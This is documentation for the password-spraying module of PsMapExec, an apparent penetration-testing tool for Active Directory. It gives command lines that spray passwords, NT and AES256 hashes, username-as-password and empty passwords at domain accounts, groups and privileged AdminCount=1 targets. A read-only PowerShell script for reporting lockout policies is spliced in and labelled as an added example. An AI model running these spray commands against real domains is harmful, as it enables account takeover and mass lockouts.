The spray module provides different password spraying techniques. PsMapExec takes into account the default domain policy's account lockout threshold to prevent user account lockouts. However, it does not consider fine-grained password policies. It's advisable to assess whether such policies are in place within the environment to avoid potentially locking out a significant number of user accounts.
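One way to carry out the fine-grained password policy assessment advised above, as an added example that is not part of PsMapExec or its documentation. It assumes the RSAT ActiveDirectory module and an account allowed to read the Password Settings Container; the function name `Get-LockoutPolicyReport` is hypothetical.

```powershell
# Added example: read-only report of lockout settings. Nothing is modified.
Import-Module ActiveDirectory

function Get-LockoutPolicyReport {
    # Baseline: the default domain policy, the only one PsMapExec accounts for.
    $default = Get-ADDefaultDomainPasswordPolicy
    $report = @([pscustomobject]@{
        Policy              = 'Default Domain Policy'
        Precedence          = $null
        LockoutThreshold    = $default.LockoutThreshold
        ObservationWindow   = $default.LockoutObservationWindow
        LockoutDuration     = $default.LockoutDuration
        AppliesTo           = '(accounts with no fine-grained policy)'
        StricterThanDefault = $false
    })

    # Every fine-grained policy (PSO), lowest precedence value (winning policy) first.
    foreach ($pso in Get-ADFineGrainedPasswordPolicy -Filter * | Sort-Object Precedence) {
        # Users and groups the PSO is linked to.
        $subjects = Get-ADFineGrainedPasswordPolicySubject -Identity $pso |
            ForEach-Object { "$($_.Name) [$($_.ObjectClass)]" }

        # A threshold of 0 means "never lock out". A PSO is stricter when it
        # locks accounts after fewer failed attempts than the default policy.
        $stricter = $pso.LockoutThreshold -gt 0 -and
            ($default.LockoutThreshold -eq 0 -or
             $pso.LockoutThreshold -lt $default.LockoutThreshold)

        $report += [pscustomobject]@{
            Policy              = $pso.Name
            Precedence          = $pso.Precedence
            LockoutThreshold    = $pso.LockoutThreshold
            ObservationWindow   = $pso.LockoutObservationWindow
            LockoutDuration     = $pso.LockoutDuration
            AppliesTo           = ($subjects -join '; ')
            StricterThanDefault = $stricter
        }
    }
    $report
}

Get-LockoutPolicyReport | Format-Table -AutoSize -Wrap
```

Rows marked `StricterThanDefault` identify the users and groups that can lock out before the default threshold is reached. An empty policy list returned to an account without read access to the Password Settings Container does not show that no fine-grained policies exist.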
When using the Spray method, the -Targets parameter can be provided. Specifying "all" sprays all enabled user accounts in the domain. Otherwise, any other value will be treated as a group name. When -Targets is omitted, PsMapExec will spray all enabled Active Directory accounts.
PsMapExec -Method Spray # Sprays all
PsMapExec -Method Spray -Targets all # Sprays all
PsMapExec -Method Spray -Targets "C:\Users.txt" # Sprays users from list (SamAccountNames)
PsMapExec -Method Spray -Targets "AdminCount=1" # Sprays targets with AdminCount=1
PsMapExec -Method Spray -Targets "Group Name" # Sprays members of group
Hash authentication supports RC4/NT, NTLM and AES256 hashes.
PsMapExec -Method Spray -SprayHash [RC4]
PsMapExec -Method Spray -SprayHash [AES256]
PsMapExec -Method Spray -SprayHash [NTLM]
PsMapExec -Method Spray -SprayPassword [Password]
Sets the password to the username value. This switch will also attempt to authenticate as computer accounts to identify any that might be current or legacy Pre-Windows 2000 Compatible Computers.
PsMapExec -Method Spray -AccountAsPassword
Authentication attempts are performed with empty password values.
PsMapExec -Method Spray -EmptyPassword
Displays only successful authentication attempts.
PsMapExec -Method Spray -SprayPassword Password123! -SuccessOnly